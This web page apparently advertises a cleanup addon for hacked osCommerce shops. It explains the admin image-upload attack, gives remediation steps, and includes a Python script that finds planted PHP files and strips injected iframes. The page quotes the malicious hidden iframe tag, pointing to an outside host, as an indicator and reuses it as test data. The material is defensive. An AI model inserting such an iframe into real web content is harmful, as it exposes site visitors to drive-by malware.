OSCommerce Hackaway

There has been a recent increase in attacks on OSCommerce websites. Hackers exploit a vulnerability in the admin page that is normally used for uploading product pictures to the /images directory. Several PHP files are uploaded there and then executed. Server information such as the database configuration, and sometimes credit card orders, is displayed and captured.

Sometimes traces are left by the hacker. PHP files show up in the images directory (though sometimes they're deleted after being run). Often, the following code is added to every product_description and categories_description entry:

<iframe src="http://www.vcp-counter.com/unique/index.php" width=0 height=0 frameborder=0></iframe>

What Should I do?

The exploit cannot be run on sites where the admin directory is password protected. If you use your webserver control panel to set up a username/password (Basic Authentication) on the admin directory, you can get your browser to remember the username and password for you so logging in isn't onerous, but you'll be safe from further exploits using this method.

Of course, if there are PHP files left in your images directory, the hacker could come back and run them to get your customer orders again - DELETE THEM!

Change the passwords for your FTP account and your MySQL database. You should normally be able to do this in your website control panel.

Finally, antivirus software may report MALWARE on your website if you leave the iframe HTML in your database. Simply edit every entry manually to remove it... easier said than done, I know. That's why I've written PHP software which will do the job for you. The code you get when you click a purchase button below checks your images directory for PHP files and then allows you to delete them. It also checks your database for IFRAME tags and will allow you to automatically remove them from every database entry.
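As an added illustration (not the author's addon and not osCommerce code), here is a Python stand-in for the two checks just described: listing PHP files dropped in the images directory, including scripts hidden under an image file name, and stripping iframe tags from the description tables. It assumes the standard osCommerce products_description and categories_description tables and uses a temporary directory plus an in-memory SQLite copy of those tables as constructed sample input.

```python
import re
import sqlite3
import tempfile
from pathlib import Path

# Any <iframe ...>...</iframe>, case-insensitive, spanning newlines.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe>", re.IGNORECASE | re.DOTALL)
# The tag quoted above, used here only as constructed sample data.
INJECTED = '<iframe src="http://www.vcp-counter.com/unique/index.php" width=0 height=0 frameborder=0></iframe>'
# osCommerce description tables (assumed schema): (table, id column, text column).
TABLES = (("products_description", "products_id", "products_description"),
          ("categories_description", "categories_id", "categories_description"))

def find_php_files(images_dir):
    """PHP files under images_dir, by extension or by a leading '<?php' (catches scripts named like images)."""
    def is_php(p):
        return p.suffix.lower() in (".php", ".phtml", ".php5") or p.read_bytes()[:32].lstrip().startswith(b"<?php")
    return sorted(str(p.relative_to(images_dir)) for p in Path(images_dir).rglob("*") if p.is_file() and is_php(p))

def strip_iframes(text):
    """Remove every <iframe> element from one description string."""
    return IFRAME_RE.sub("", text or "")

def clean_descriptions(conn):
    """Rewrite every row in both tables that contains an iframe; returns the number of rows changed."""
    changed = 0
    for table, key, col in TABLES:
        for row_id, lang, body in conn.execute(f"SELECT {key}, language_id, {col} FROM {table}").fetchall():
            cleaned = strip_iframes(body)
            if cleaned != (body or ""):
                conn.execute(f"UPDATE {table} SET {col}=? WHERE {key}=? AND language_id=?",
                             (cleaned, row_id, lang))
                changed += 1
    conn.commit()
    return changed

def build_sample():
    """Constructed fixture: a fake images/ dir and an in-memory SQLite stand-in for the MySQL tables."""
    images = tempfile.mkdtemp()
    for name, body in (("logo.jpg", b"\xff\xd8\xff\xe0"), ("upload.php", b"<?php echo 1;"),
                       ("photo.gif", b"<?php echo 2;")):
        (Path(images) / name).write_bytes(body)
    conn = sqlite3.connect(":memory:")
    for table, key, col in TABLES:
        conn.execute(f"CREATE TABLE {table} ({key} INT, language_id INT, {col} TEXT)")
    conn.executemany("INSERT INTO products_description VALUES (?, 1, ?)",
                     [(1, "Gel saddle." + INJECTED), (2, "Hand pump.")])
    conn.execute("INSERT INTO categories_description VALUES (5, 1, ?)", (INJECTED + "Bike parts.",))
    return images, conn
```

On a real site you would point find_php_files at the shop's images directory and run clean_descriptions against a MySQL connection after taking a database backup; the content check matters because a dropped script may be renamed to look like a picture.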

Click Buy Now to purchase the addon to install onto your site. It's very simple to install and configure and was written with instructions for OSC MS2.2 RC2 but has also been integrated with CRELoaded. Or choose the install option to have us do it all for you.


The process isn't automatic. You'll be sent an email by a real person and you can converse by email if you have problems or questions. Please allow extra time if ordering in the evening or at the weekend (UK time). If you pay for Install, there is no guarantee given about when the work can be done, but if you're unhappy, you'll get a refund.

